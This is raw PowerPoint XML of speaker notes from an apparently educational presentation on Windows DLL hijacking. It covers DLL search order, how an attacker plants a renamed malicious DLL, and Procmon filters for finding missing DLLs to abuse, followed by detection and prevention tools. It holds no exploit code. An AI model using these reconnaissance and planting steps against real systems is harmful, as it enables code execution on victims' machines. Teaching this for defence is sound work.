              <a:t>Still CVE reports of bad library loading in Windows 10. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6132</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Certain companies still following bad practise however.</a:t>
            </a:r>
          </a:p>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Fix by Dell to allow a program of theirs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ChangeAuditor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Agent service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  to run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>http://documents.software.dell.com/change-auditor-for-advanced-users/6.7/technical-insight-guide/coordinator-registry-settings/enable-changeauditor-agent-service-to-start-with-the-microsoft-security-update-kb2264107?ParentProduct=936 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Last revised: 7/17/2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As a user based on what we’ve seen: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Use tools at our disposal to determine suspicious behavior. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Procmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>TCPView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>procexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> All part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SysInternalSuite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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err="1" smtClean="0"/>
              <a:t>TCPview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to find PIDs and processes that are trying to make or already have TCP connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(Detection)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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err="1" smtClean="0"/>
              <a:t>ProcMon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to find activity of the suspect PID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(Detection)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0"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err="1" smtClean="0"/>
              <a:t>Procexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> gives more detail about parent/child processes. What a process calls.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DLL Hijack Auditor, a tool which will allow a user to see if any vulnerable applications exist. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(Detection)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err="1" smtClean="0"/>
              <a:t>Applocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is part of Enterprise version of Windows. By default denies execution of any code by default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(Prevention)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baseline="0" dirty="0" smtClean="0"/>
              <a:t>Uses Whitelisting to determine what is allowed to run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baseline="0" dirty="0" smtClean="0"/>
              <a:t>Besides, the usual of avoiding suspicious sites and untrusted sources. Some questions that come up:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Auto downloading in browsers, which is still happening in Edge, very recently in chrome as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Virus scanning compressed files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Keeping all downloads within one folder. A single DLL as we saw, resulted in at least 4 installers being vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Execute downloaded files from different directories.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Disable auto download. Firefox already does this. I believe chrome as of now does as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1277014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 DLL's can be linked either at load time (static), or at runtime (dynamic)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Load time (static) linking links a DLL when a program is first compiled. Linking involves importing the entire DLL library into the application before compilation,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> via header files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>. This makes a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>program larger in size, but is safer as there is no search paths to traverse (Unless the system or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> application itself is already compromised)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Run time linking links a DLL when a compiled program is first run. Uses LoadLibrary or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>LoadLibraryEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t> functions (Part of windows API) to load the required DLL into memory. A function from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t> can then be called via its address in memory, using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>. Basically using function pointers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3788046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The unsafe use of the LoadLibrary function gives rise to potential DLL hijacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>If a DLL is not part of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> known DLLs in HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>\Control\Session Manager\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>KnownDLLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>OR not already in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And is reference only by a name</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Windows uses a search order hierarchy to find the required DLL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>See https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175%28v=vs.85%29.aspx for function documentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1161905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 For Windows XP Below SP2, the following was the search hierarchy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Search Order (SSO)</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>1) Application Directory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>2) Current Directory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>3) System Directory (C:\Windows\System32)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>4) 16-bit System Directory (C:\Windows\System)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>5) Windows Directory (C:\Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>6) Directories in PATH environment variables (part of system configuration, can be modified)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2369092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By default the search hierarchy in windows XP SP2+ and 7 was:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> was done through a registry fix, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>HKEY_LOCAL_MACHINE\System\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\Control\Session Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>SafeDllSearchMode</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>1) Application Directory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>2) System Directory (C:\Windows\System32)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>3) 16-bit System Directory (C:\Windows\System)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>4) Windows Directory (C:\Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>5) Current Directory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>6) Directories in PATH environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Current Working Directory was moved lower down the search order to try and mitigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the threat, however threat is still possible as will be seen.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1870710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Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>An attacker can therefore take advantage of such a scenario by placing a malicious copy of a DLL into a path which is searched higher up in the search order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>DLL was not specified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> by an a path</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>  - An application needs to load req.dll, and an absolute path is not provided when the LoadLibrary function is called.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>  - The actual req.dll file is located in the Windows Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>  - The attacker realizes this, and manages to place a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>, which they rename to req.dll, in the same location from where the application is launched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>  - The application will then load this malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t> rather then the original copy located in the Windows Directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4264811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 Can use process monitor (procmon), written by Mark Russinovich, to determine the DLLs that an application calls to be loaded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Set filters so that we only see the application in question, and any DLLs that it fails to find.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Can use the following filters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	</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 Process Name is process in question</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" kern="1200" baseline="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 Path contains .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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	- Operation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>QueryOpen</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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	- Result is Name not Found</a:t>
            </a:r>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pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>If it fails to find a certain DLL, we know that the DLL search order is being traversed, and can use this to our advantage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>In reality,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> finding a suitable DLL is a trial and error process. Especially if we wish the exploit to be undetected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Picking an unsuitable DLL could result in errors being thrown by the program, or the program not running at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Certain tools can debug DLLs to allow us to find suitable candidates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>DLL export viewer allows us to see all functions within a DLL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Dependency walker allows us to see all DLLs a certain DLL may depend on, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which functions its importing, exporting from other modules.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
